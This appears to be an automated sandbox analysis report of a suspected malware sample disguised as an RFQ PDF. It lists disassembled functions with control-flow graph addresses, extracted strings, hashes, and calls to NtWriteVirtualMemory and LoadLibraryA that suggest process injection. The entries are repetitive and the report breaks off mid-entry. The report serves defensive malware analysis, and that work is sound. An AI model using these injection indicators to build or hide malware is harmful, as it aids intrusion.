                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B74FD, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 691COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 892 20b74fd-20b75a2 894 20b75a8-20b7708 call 20b765f 892->894 903 20b770e-20b783a call 20b778b call 20bdb82 894->903 904 20bfc31-20bfc35 894->904 916 20b0ebf-20b0f36 903->916 917 20b7840-20b7851 903->917 906 20bfc36-20bfc57 904->906 906->906 908 20bfc59-20bfc5b 906->908 929 20b0fb0-20b0fb7 916->929 919 20bbae2-20bbb62 917->919 920 20b7857-20b7b24 call 20bbaa1 call 20bef3c 917->920 919->916 927 20bbb68-20bbc98 call 20bbc52 919->927 955 20b7b2a-20b8043 call 20bbae2 call 20bef3c call 20b8bed call 20bb969 call 20bef3c 920->955 956 20b8aed-20b8bb6 call 20bef3c * 3 920->956 945 20bbc9a-20bbce2 call 20bc7bf call 20bbd26 927->945 946 20bbce5-20bbd25 LoadLibraryA call 20bbd26 927->946 933 20b0fb9-20b75a2 929->933 934 20b0faf 929->934 933->894 934->929 945->946 955->956 997 20b8049-20b806e 955->997 998 20b0e9a-20b0ebc call 20b0d1f 997->998 999 20b8074-20b81f0 call 20bef3c 997->999 999->956 1011 20b81f6-20b8494 call 20bef3c 999->1011 1011->956 1021 20b849a-20b84f9 1011->1021 1021->956 1023 20b84ff-20b8564 1021->1023 1025 20b8566-20b858b 1023->1025 1026 20b85c5-20b85dc 1023->1026 1025->956 1027 20b8591-20b85c3 1025->1027 1026->956 1028 20b85e2-20b87d1 call 20bc330 1026->1028 1027->1026 1028->956 1039 20b87d7-20b88cf call 20bfc31 NtWriteVirtualMemory 1028->1039 1039->956 1044 20b88d5-20b89b4 call 20bef3c 1039->1044 1044->956 1050 20b89ba-20b8a7d call 20bef3c 1044->1050 1050->956 1055 20b8a7f-20b8aec call 20bef3c 1050->1055
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 42c213b5ead505d04c30300027bcbf9502631cdf29f608f8375a5d38de28c0d0
                              • Instruction ID: fc90854eba156434d176c8f823fed442a01783ae840288e1b6fa0709c6b2f60b
                              • Opcode Fuzzy Hash: 42c213b5ead505d04c30300027bcbf9502631cdf29f608f8375a5d38de28c0d0
                              • Instruction Fuzzy Hash: 7A52FEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7664, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 676librarynativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1059 20b7664-20b766a 1060 20b7629-20b76af 1059->1060 1061 20b766c-20b767c 1059->1061 1064 20b76e1-20b7708 1060->1064 1063 20b7681-20b76af call 20b765f 1061->1063 1063->1064 1066 20b770e-20b783a call 20b778b call 20bdb82 1064->1066 1067 20bfc31-20bfc35 1064->1067 1082 20b0ebf-20b0f36 1066->1082 1083 20b7840-20b7851 1066->1083 1071 20bfc36-20bfc57 1067->1071 1071->1071 1073 20bfc59-20bfc5b 1071->1073 1095 20b0fb0-20b0fb7 1082->1095 1085 20bbae2-20bbb62 1083->1085 1086 20b7857-20b7b24 call 20bbaa1 call 20bef3c 1083->1086 1085->1082 1093 20bbb68-20bbc98 call 20bbc52 1085->1093 1124 20b7b2a-20b8043 call 20bbae2 call 20bef3c call 20b8bed call 20bb969 call 20bef3c 1086->1124 1125 20b8aed-20b8bb6 call 20bef3c * 3 1086->1125 1114 20bbc9a-20bbce2 call 20bc7bf call 20bbd26 1093->1114 1115 20bbce5-20bbd25 LoadLibraryA call 20bbd26 1093->1115 1099 20b0fb9-20b763e 1095->1099 1100 20b0faf 1095->1100 1099->1063 1100->1095 1114->1115 1124->1125 1166 20b8049-20b806e 1124->1166 1167 20b0e9a-20b0ebc call 20b0d1f 1166->1167 1168 20b8074-20b81f0 call 20bef3c 1166->1168 1168->1125 1180 20b81f6-20b8494 call 20bef3c 1168->1180 1180->1125 1190 20b849a-20b84f9 1180->1190 1190->1125 1192 20b84ff-20b8564 1190->1192 1194 20b8566-20b858b 1192->1194 1195 20b85c5-20b85dc 1192->1195 1194->1125 1196 20b8591-20b85c3 1194->1196 1195->1125 1197 20b85e2-20b87d1 call 20bc330 1195->1197 1196->1195 1197->1125 1208 20b87d7-20b88cf call 20bfc31 NtWriteVirtualMemory 1197->1208 1208->1125 1213 20b88d5-20b89b4 call 20bef3c 1208->1213 1213->1125 1219 20b89ba-20b8a7d call 20bef3c 1213->1219 1219->1125 1224 20b8a7f-20b8aec call 20bef3c 1219->1224
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              • LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoadMemoryVirtualWrite
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 3569954152-2585089168
                              • Opcode ID: 20b126e1680cad97ac7a464efb94d5641e89212dc4b90ef9f2aa071cbecaef1c
                              • Instruction ID: 3a8199c8a87e88593bc6e9770a209bf5a382f0e095e3d2107b1cedb5892778c4
                              • Opcode Fuzzy Hash: 20b126e1680cad97ac7a464efb94d5641e89212dc4b90ef9f2aa071cbecaef1c
                              • Instruction Fuzzy Hash: C2520EB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B752E, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 675librarynativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1228 20b752e 1229 20b75a8-20b7708 call 20b765f 1228->1229 1238 20b770e-20b783a call 20b778b call 20bdb82 1229->1238 1239 20bfc31-20bfc35 1229->1239 1251 20b0ebf-20b0f36 1238->1251 1252 20b7840-20b7851 1238->1252 1241 20bfc36-20bfc57 1239->1241 1241->1241 1243 20bfc59-20bfc5b 1241->1243 1264 20b0fb0-20b0fb7 1251->1264 1254 20bbae2-20bbb62 1252->1254 1255 20b7857-20b7b24 call 20bbaa1 call 20bef3c 1252->1255 1254->1251 1262 20bbb68-20bbc98 call 20bbc52 1254->1262 1290 20b7b2a-20b8043 call 20bbae2 call 20bef3c call 20b8bed call 20bb969 call 20bef3c 1255->1290 1291 20b8aed-20b8bb6 call 20bef3c * 3 1255->1291 1280 20bbc9a-20bbce2 call 20bc7bf call 20bbd26 1262->1280 1281 20bbce5-20bbd25 LoadLibraryA call 20bbd26 1262->1281 1268 20b0fb9-20b75a2 1264->1268 1269 20b0faf 1264->1269 1268->1229 1269->1264 1280->1281 1290->1291 1332 20b8049-20b806e 1290->1332 1333 20b0e9a-20b0ebc call 20b0d1f 1332->1333 1334 20b8074-20b81f0 call 20bef3c 1332->1334 1334->1291 1346 20b81f6-20b8494 call 20bef3c 1334->1346 1346->1291 1356 20b849a-20b84f9 1346->1356 1356->1291 1358 20b84ff-20b8564 1356->1358 1360 20b8566-20b858b 1358->1360 1361 20b85c5-20b85dc 1358->1361 1360->1291 1362 20b8591-20b85c3 1360->1362 1361->1291 1363 20b85e2-20b87d1 call 20bc330 1361->1363 1362->1361 1363->1291 1374 20b87d7-20b88cf call 20bfc31 NtWriteVirtualMemory 1363->1374 1374->1291 1379 20b88d5-20b89b4 call 20bef3c 1374->1379 1379->1291 1385 20b89ba-20b8a7d call 20bef3c 1379->1385 1385->1291 1390 20b8a7f-20b8aec call 20bef3c 1385->1390
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              • LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoadMemoryVirtualWrite
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 3569954152-2585089168
                              • Opcode ID: ca20578a3ec653d3610c20cb37d3a92a72e6c9a20fd83a2f7333429b87f2cabd
                              • Instruction ID: 4ad419ca8e701db406ef57291f5535e175beff1ea56fec5a9df7509b91f0ce76
                              • Opcode Fuzzy Hash: ca20578a3ec653d3610c20cb37d3a92a72e6c9a20fd83a2f7333429b87f2cabd
                              • Instruction Fuzzy Hash: 2E52FDB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7631, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 673librarynativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1394 20b7631-20b7632
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              • LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoadMemoryVirtualWrite
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 3569954152-2585089168
                              • Opcode ID: 6137ba8beb5d425fec5cb227dca78656f72fe2713a275efb5543e7522ba9b67a
                              • Instruction ID: 8fb88cdb2042e980310e1935e7686751621ffc4a26a3e51a2d1923b1da18aec2
                              • Opcode Fuzzy Hash: 6137ba8beb5d425fec5cb227dca78656f72fe2713a275efb5543e7522ba9b67a
                              • Instruction Fuzzy Hash: 4A52FEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7539, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 672COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1395 20b7539-20b763e 1398 20b7681-20b7708 call 20b765f 1395->1398 1404 20b770e-20b783a call 20b778b call 20bdb82 1398->1404 1405 20bfc31-20bfc35 1398->1405 1417 20b0ebf-20b0f36 1404->1417 1418 20b7840-20b7851 1404->1418 1407 20bfc36-20bfc57 1405->1407 1407->1407 1409 20bfc59-20bfc5b 1407->1409 1430 20b0fb0-20b0fb7 1417->1430 1420 20bbae2-20bbb62 1418->1420 1421 20b7857-20b7b24 call 20bbaa1 call 20bef3c 1418->1421 1420->1417 1428 20bbb68-20bbc98 call 20bbc52 1420->1428 1459 20b7b2a-20b8043 call 20bbae2 call 20bef3c call 20b8bed call 20bb969 call 20bef3c 1421->1459 1460 20b8aed-20b8bb6 call 20bef3c * 3 1421->1460 1449 20bbc9a-20bbce2 call 20bc7bf call 20bbd26 1428->1449 1450 20bbce5-20bbd25 LoadLibraryA call 20bbd26 1428->1450 1434 20b0fb9-20b763e 1430->1434 1435 20b0faf 1430->1435 1434->1398 1435->1430 1449->1450 1459->1460 1501 20b8049-20b806e 1459->1501 1502 20b0e9a-20b0ebc call 20b0d1f 1501->1502 1503 20b8074-20b81f0 call 20bef3c 1501->1503 1503->1460 1515 20b81f6-20b8494 call 20bef3c 1503->1515 1515->1460 1525 20b849a-20b84f9 1515->1525 1525->1460 1527 20b84ff-20b8564 1525->1527 1529 20b8566-20b858b 1527->1529 1530 20b85c5-20b85dc 1527->1530 1529->1460 1531 20b8591-20b85c3 1529->1531 1530->1460 1532 20b85e2-20b87d1 call 20bc330 1530->1532 1531->1530 1532->1460 1543 20b87d7-20b88cf call 20bfc31 NtWriteVirtualMemory 1532->1543 1543->1460 1548 20b88d5-20b89b4 call 20bef3c 1543->1548 1548->1460 1554 20b89ba-20b8a7d call 20bef3c 1548->1554 1554->1460 1559 20b8a7f-20b8aec call 20bef3c 1554->1559
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: e1156558954b63255f036f096994e7307497995cdf2d42d9cec2e341043dd5d5
                              • Instruction ID: 2cc9dd8c92ebbecc84615ce7c60c4b573da0c5c72ba91289a8508bb429439e46
                              • Opcode Fuzzy Hash: e1156558954b63255f036f096994e7307497995cdf2d42d9cec2e341043dd5d5
                              • Instruction Fuzzy Hash: 9F52FEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B75E9, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 672librarynativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1563 20b75e9-20b7603 1564 20b7635-20b7708 call 20b765f 1563->1564 1571 20b770e-20b783a call 20b778b call 20bdb82 1564->1571 1572 20bfc31-20bfc35 1564->1572 1584 20b0ebf-20b0f36 1571->1584 1585 20b7840-20b7851 1571->1585 1574 20bfc36-20bfc57 1572->1574 1574->1574 1576 20bfc59-20bfc5b 1574->1576 1597 20b0fb0-20b0fb7 1584->1597 1587 20bbae2-20bbb62 1585->1587 1588 20b7857-20b7b24 call 20bbaa1 call 20bef3c 1585->1588 1587->1584 1595 20bbb68-20bbc98 call 20bbc52 1587->1595 1625 20b7b2a-20b8043 call 20bbae2 call 20bef3c call 20b8bed call 20bb969 call 20bef3c 1588->1625 1626 20b8aed-20b8bb6 call 20bef3c * 3 1588->1626 1615 20bbc9a-20bbce2 call 20bc7bf call 20bbd26 1595->1615 1616 20bbce5-20bbd25 LoadLibraryA call 20bbd26 1595->1616 1601 20b0fb9-20b7603 1597->1601 1602 20b0faf 1597->1602 1601->1564 1602->1597 1615->1616 1625->1626 1667 20b8049-20b806e 1625->1667 1668 20b0e9a-20b0ebc call 20b0d1f 1667->1668 1669 20b8074-20b81f0 call 20bef3c 1667->1669 1669->1626 1681 20b81f6-20b8494 call 20bef3c 1669->1681 1681->1626 1691 20b849a-20b84f9 1681->1691 1691->1626 1693 20b84ff-20b8564 1691->1693 1695 20b8566-20b858b 1693->1695 1696 20b85c5-20b85dc 1693->1696 1695->1626 1697 20b8591-20b85c3 1695->1697 1696->1626 1698 20b85e2-20b87d1 call 20bc330 1696->1698 1697->1696 1698->1626 1709 20b87d7-20b88cf call 20bfc31 NtWriteVirtualMemory 1698->1709 1709->1626 1714 20b88d5-20b89b4 call 20bef3c 1709->1714 1714->1626 1720 20b89ba-20b8a7d call 20bef3c 1714->1720 1720->1626 1725 20b8a7f-20b8aec call 20bef3c 1720->1725
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              • LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoadMemoryVirtualWrite
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 3569954152-2585089168
                              • Opcode ID: 1e4058340c9039560c4a26737fb0fba86d5f10e99683c9f3f484c1755f3e44d8
                              • Instruction ID: 577d4fac52316c382c7181b908aabca36fe805b0599965f08c9ea7c638ad77d9
                              • Opcode Fuzzy Hash: 1e4058340c9039560c4a26737fb0fba86d5f10e99683c9f3f484c1755f3e44d8
                              • Instruction Fuzzy Hash: 3852FEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B760D, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 664COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1729 20b760d-20b760e 1730 20b7688-20b7708 1729->1730 1733 20b770e-20b783a call 20b778b call 20bdb82 1730->1733 1734 20bfc31-20bfc35 1730->1734 1746 20b0ebf-20b0f36 1733->1746 1747 20b7840-20b7851 1733->1747 1736 20bfc36-20bfc57 1734->1736 1736->1736 1738 20bfc59-20bfc5b 1736->1738 1759 20b0fb0-20b0fb7 1746->1759 1749 20bbae2-20bbb62 1747->1749 1750 20b7857-20b7b24 call 20bbaa1 call 20bef3c 1747->1750 1749->1746 1757 20bbb68-20bbc98 call 20bbc52 1749->1757 1791 20b7b2a-20b8043 call 20bbae2 call 20bef3c call 20b8bed call 20bb969 call 20bef3c 1750->1791 1792 20b8aed-20b8bb6 call 20bef3c * 3 1750->1792 1779 20bbc9a-20bbce2 call 20bc7bf call 20bbd26 1757->1779 1780 20bbce5-20bbd25 LoadLibraryA call 20bbd26 1757->1780 1763 20b0fb9-20b7687 call 20b765f 1759->1763 1764 20b0faf 1759->1764 1763->1730 1764->1759 1779->1780 1791->1792 1833 20b8049-20b806e 1791->1833 1834 20b0e9a-20b0ebc call 20b0d1f 1833->1834 1835 20b8074-20b81f0 call 20bef3c 1833->1835 1835->1792 1847 20b81f6-20b8494 call 20bef3c 1835->1847 1847->1792 1857 20b849a-20b84f9 1847->1857 1857->1792 1859 20b84ff-20b8564 1857->1859 1861 20b8566-20b858b 1859->1861 1862 20b85c5-20b85dc 1859->1862 1861->1792 1863 20b8591-20b85c3 1861->1863 1862->1792 1864 20b85e2-20b87d1 call 20bc330 1862->1864 1863->1862 1864->1792 1875 20b87d7-20b88cf call 20bfc31 NtWriteVirtualMemory 1864->1875 1875->1792 1880 20b88d5-20b89b4 call 20bef3c 1875->1880 1880->1792 1886 20b89ba-20b8a7d call 20bef3c 1880->1886 1886->1792 1891 20b8a7f-20b8aec call 20bef3c 1886->1891
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 9166106d63c788b3d0e39a05e6259fe2ec0a2e0105d96ff38dc0bcbd43db0199
                              • Instruction ID: dbb0d15971db3eef0b821143a33b3bafa9043802fbff8b342f14a854009eb9a8
                              • Opcode Fuzzy Hash: 9166106d63c788b3d0e39a05e6259fe2ec0a2e0105d96ff38dc0bcbd43db0199
                              • Instruction Fuzzy Hash: A352EDB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7619, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 662COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1895 20b7619-20b761a 1896 20b7694-20b7708 1895->1896 1898 20b770e-20b783a call 20b778b call 20bdb82 1896->1898 1899 20bfc31-20bfc35 1896->1899 1911 20b0ebf-20b0f36 1898->1911 1912 20b7840-20b7851 1898->1912 1901 20bfc36-20bfc57 1899->1901 1901->1901 1903 20bfc59-20bfc5b 1901->1903 1924 20b0fb0-20b0fb7 1911->1924 1914 20bbae2-20bbb62 1912->1914 1915 20b7857-20b7b24 call 20bbaa1 call 20bef3c 1912->1915 1914->1911 1922 20bbb68-20bbc98 call 20bbc52 1914->1922 1957 20b7b2a-20b8043 call 20bbae2 call 20bef3c call 20b8bed call 20bb969 call 20bef3c 1915->1957 1958 20b8aed-20b8bb6 call 20bef3c * 3 1915->1958 1944 20bbc9a-20bbce2 call 20bc7bf call 20bbd26 1922->1944 1945 20bbce5-20bbd25 LoadLibraryA call 20bbd26 1922->1945 1928 20b0fb9-20b768e call 20b765f 1924->1928 1929 20b0faf 1924->1929 1928->1896 1929->1924 1944->1945 1957->1958 1999 20b8049-20b806e 1957->1999 2000 20b0e9a-20b0ebc call 20b0d1f 1999->2000 2001 20b8074-20b81f0 call 20bef3c 1999->2001 2001->1958 2013 20b81f6-20b8494 call 20bef3c 2001->2013 2013->1958 2023 20b849a-20b84f9 2013->2023 2023->1958 2025 20b84ff-20b8564 2023->2025 2027 20b8566-20b858b 2025->2027 2028 20b85c5-20b85dc 2025->2028 2027->1958 2029 20b8591-20b85c3 2027->2029 2028->1958 2030 20b85e2-20b87d1 call 20bc330 2028->2030 2029->2028 2030->1958 2041 20b87d7-20b88cf call 20bfc31 NtWriteVirtualMemory 2030->2041 2041->1958 2046 20b88d5-20b89b4 call 20bef3c 2041->2046 2046->1958 2052 20b89ba-20b8a7d call 20bef3c 2046->2052 2052->1958 2057 20b8a7f-20b8aec call 20bef3c 2052->2057
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: cbb4b43df01100c326054e8ea1a7859f4158e457f499b75db382be7d4f2c3bb2
                              • Instruction ID: 6ceb5ba58019c8d93237772a9c54b0d66ac0c343f19cc6934ef56b5606de1d83
                              • Opcode Fuzzy Hash: cbb4b43df01100c326054e8ea1a7859f4158e457f499b75db382be7d4f2c3bb2
                              • Instruction Fuzzy Hash: BC52EEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7625, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 662COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2061 20b7625-20b76af 2063 20b76e1-20b7708 2061->2063 2064 20b770e-20b783a call 20b778b call 20bdb82 2063->2064 2065 20bfc31-20bfc35 2063->2065 2077 20b0ebf-20b0f36 2064->2077 2078 20b7840-20b7851 2064->2078 2067 20bfc36-20bfc57 2065->2067 2067->2067 2069 20bfc59-20bfc5b 2067->2069 2090 20b0fb0-20b0fb7 2077->2090 2080 20bbae2-20bbb62 2078->2080 2081 20b7857-20b7b24 call 20bbaa1 call 20bef3c 2078->2081 2080->2077 2088 20bbb68-20bbc98 call 20bbc52 2080->2088 2123 20b7b2a-20b8043 call 20bbae2 call 20bef3c call 20b8bed call 20bb969 call 20bef3c 2081->2123 2124 20b8aed-20b8bb6 call 20bef3c * 3 2081->2124 2110 20bbc9a-20bbce2 call 20bc7bf call 20bbd26 2088->2110 2111 20bbce5-20bbd25 LoadLibraryA call 20bbd26 2088->2111 2094 20b0fb9-20b76af call 20b765f 2090->2094 2095 20b0faf 2090->2095 2094->2063 2095->2090 2110->2111 2123->2124 2166 20b8049-20b806e 2123->2166 2167 20b0e9a-20b0ebc call 20b0d1f 2166->2167 2168 20b8074-20b81f0 call 20bef3c 2166->2168 2168->2124 2180 20b81f6-20b8494 call 20bef3c 2168->2180 2180->2124 2190 20b849a-20b84f9 2180->2190 2190->2124 2192 20b84ff-20b8564 2190->2192 2194 20b8566-20b858b 2192->2194 2195 20b85c5-20b85dc 2192->2195 2194->2124 2196 20b8591-20b85c3 2194->2196 2195->2124 2197 20b85e2-20b87d1 call 20bc330 2195->2197 2196->2195 2197->2124 2208 20b87d7-20b88cf call 20bfc31 NtWriteVirtualMemory 2197->2208 2208->2124 2213 20b88d5-20b89b4 call 20bef3c 2208->2213 2213->2124 2219 20b89ba-20b8a7d call 20bef3c 2213->2219 2219->2124 2224 20b8a7f-20b8aec call 20bef3c 2219->2224
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 95ed4f693ae3d6700274f89edcdf9b5b5185d306e0631e41ccf04dd91e16ab62
                              • Instruction ID: f0e9f181efbb020898ff7e7d948d3cc203736b21ccc57abb95e7feb50f9d3d2e
                              • Opcode Fuzzy Hash: 95ed4f693ae3d6700274f89edcdf9b5b5185d306e0631e41ccf04dd91e16ab62
                              • Instruction Fuzzy Hash: 7F52FEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B76DD, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 660COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2228 20b76dd-20b775e 2230 20b7761-20b783a call 20b778b call 20bdb82 2228->2230 2239 20b0ebf-20b0f36 2230->2239 2240 20b7840-20b7851 2230->2240 2252 20b0fb0-20b0fb7 2239->2252 2242 20bbae2-20bbb62 2240->2242 2243 20b7857-20b7b24 call 20bbaa1 call 20bef3c 2240->2243 2242->2239 2250 20bbb68-20bbc98 call 20bbc52 2242->2250 2285 20b7b2a-20b8043 call 20bbae2 call 20bef3c call 20b8bed call 20bb969 call 20bef3c 2243->2285 2286 20b8aed-20b8bb6 call 20bef3c * 3 2243->2286 2272 20bbc9a-20bbce2 call 20bc7bf call 20bbd26 2250->2272 2273 20bbce5-20bbd25 LoadLibraryA call 20bbd26 2250->2273 2256 20b0fb9-20b7708 call 20b765f 2252->2256 2257 20b0faf 2252->2257 2296 20b770e-20b772f 2256->2296 2297 20bfc31-20bfc35 2256->2297 2257->2252 2272->2273 2285->2286 2333 20b8049-20b806e 2285->2333 2296->2230 2301 20bfc36-20bfc57 2297->2301 2301->2301 2304 20bfc59-20bfc5b 2301->2304 2334 20b0e9a-20b0ebc call 20b0d1f 2333->2334 2335 20b8074-20b81f0 call 20bef3c 2333->2335 2335->2286 2347 20b81f6-20b8494 call 20bef3c 2335->2347 2347->2286 2357 20b849a-20b84f9 2347->2357 2357->2286 2359 20b84ff-20b8564 2357->2359 2361 20b8566-20b858b 2359->2361 2362 20b85c5-20b85dc 2359->2362 2361->2286 2363 20b8591-20b85c3 2361->2363 2362->2286 2364 20b85e2-20b87d1 call 20bc330 2362->2364 2363->2362 2364->2286 2375 20b87d7-20b88cf call 20bfc31 NtWriteVirtualMemory 2364->2375 2375->2286 2380 20b88d5-20b89b4 call 20bef3c 2375->2380 2380->2286 2386 20b89ba-20b8a7d call 20bef3c 2380->2386 2386->2286 2391 20b8a7f-20b8aec call 20bef3c 2386->2391
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: aa984c7365ea985de5c9ee7ec11bdb8367f2a005d80cc1ce35c1eb57770c294c
                              • Instruction ID: 27887d7fff6dad5ced898b7adeb0e78704a4ca91f9f576ddd1d28b0eea4045ec
                              • Opcode Fuzzy Hash: aa984c7365ea985de5c9ee7ec11bdb8367f2a005d80cc1ce35c1eb57770c294c
                              • Instruction Fuzzy Hash: C852FEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7790, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 640librarynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              • LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoadMemoryVirtualWrite
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 3569954152-2585089168
                              • Opcode ID: d4e815ac1db29d71e76729eb811c7bce3b40173516b1b11d436e9289fa53904c
                              • Instruction ID: 78763811288b1acf40a6235631adbd392d06bff777bd0bf00318fb0d907e4591
